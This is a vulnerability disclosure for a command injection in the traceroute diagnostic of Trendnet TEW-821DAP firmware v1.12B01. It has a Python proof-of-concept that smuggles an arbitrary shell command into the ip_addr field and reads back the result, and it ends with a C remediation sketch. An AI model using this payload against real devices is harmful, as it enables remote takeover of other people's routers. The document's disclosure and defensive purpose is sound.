# Trendnet TEW-821DAP Command Injection Vulnerability During Firmware Update Process

## Vulnerability Overview

During the firmware update process, the `tools_diagnostic` function of Trendnet TEW-821DAP contains a command injection vulnerability. This function performs network diagnostics based on traceroute and saves the results to `/tmp/diagnostic`. The IP address is stored in variable `s` and used as an argument for the traceroute command. The IP address is provided by user input, and the web page validates it via an AJAX POST request using regular expressions. However, the validation does not check for shell metacharacters (such as `;` and `&`), allowing an attacker to inject malicious commands into the IP address.

## Impact Scope

- **Affected Product**: TEW-821DAP (firmware version v1.12B01)

## Remediation

- Implement stricter validation of IP address input to ensure it does not contain shell metacharacters.
- Use parameterized queries or a whitelist mechanism to prevent command injection.

## POC Code

```python
import time

# Method of the PoC client class, which provides self.session,
# self.base_url and self._post_apply().
def vuln02_traceroute_cmd(self, cmd):
    print("[*] Vul #2: Traceroute command injection")
    print(f"[*] malicious command: {cmd}")

    # The ip_addr field carries shell metacharacters after a valid address.
    payload = f'127.0.0.1; /dev/null;{cmd};'
    params = {
        "method": "1",
        "ip_addr": payload,
        "pkt_size": "56",
        "cnt": "4"
    }

    resp = self._post_apply("tools_diagnostic", params)
    print(f"[*] HTTP response code: {resp.status_code}")

    # Give the device time to write the diagnostic output.
    time.sleep(3)
    try:
        result_resp = self.session.get(f"{self.base_url}/diagnostic.xml")
        if result_resp.status_code == 200:
            print("[*] result:")
            print(result_resp.text)
    except Exception:
        pass

    return resp
```
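
The two remediation points above, sketched in C as an added example (this is not the vendor's firmware code or an official patch). It assumes a POSIX/Linux environment; the function names `is_valid_ipv4`, `build_traceroute_argv` and `run_traceroute` are hypothetical, and the output path is whatever the caller passes (the page names `/tmp/diagnostic`).

```c
#include <arpa/inet.h>
#include <fcntl.h>
#include <stddef.h>
#include <sys/wait.h>
#include <unistd.h>

/* Returns 1 only for a strict dotted-quad IPv4 literal. inet_pton()
 * rejects any trailing bytes, so "127.0.0.1; ..." style input fails. */
int is_valid_ipv4(const char *s)
{
    struct in_addr addr;
    return s != NULL && inet_pton(AF_INET, s, &addr) == 1;
}

/* Build an argument vector with the address as a single argv element.
 * Returns 0 on success, -1 if the address is rejected. */
int build_traceroute_argv(const char *ip, const char *argv[3])
{
    if (!is_valid_ipv4(ip))
        return -1;
    argv[0] = "traceroute";
    argv[1] = ip;
    argv[2] = NULL;
    return 0;
}

/* Run traceroute without a shell, writing stdout to out_path.
 * Returns the child's exit status, or -1 on rejection or error. */
int run_traceroute(const char *ip, const char *out_path)
{
    const char *argv[3];
    int status;
    pid_t pid;

    if (build_traceroute_argv(ip, argv) != 0)
        return -1;
    if ((pid = fork()) < 0)
        return -1;
    if (pid == 0) {
        int fd = open(out_path, O_WRONLY | O_CREAT | O_TRUNC, 0600);
        if (fd < 0 || dup2(fd, STDOUT_FILENO) < 0)
            _exit(126);
        execvp(argv[0], (char *const *)argv); /* no shell parses the input */
        _exit(127);                           /* exec failed */
    }
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}
```

Validation happens on the device rather than in the web page, so a request sent directly to the handler is checked the same way as one from the form.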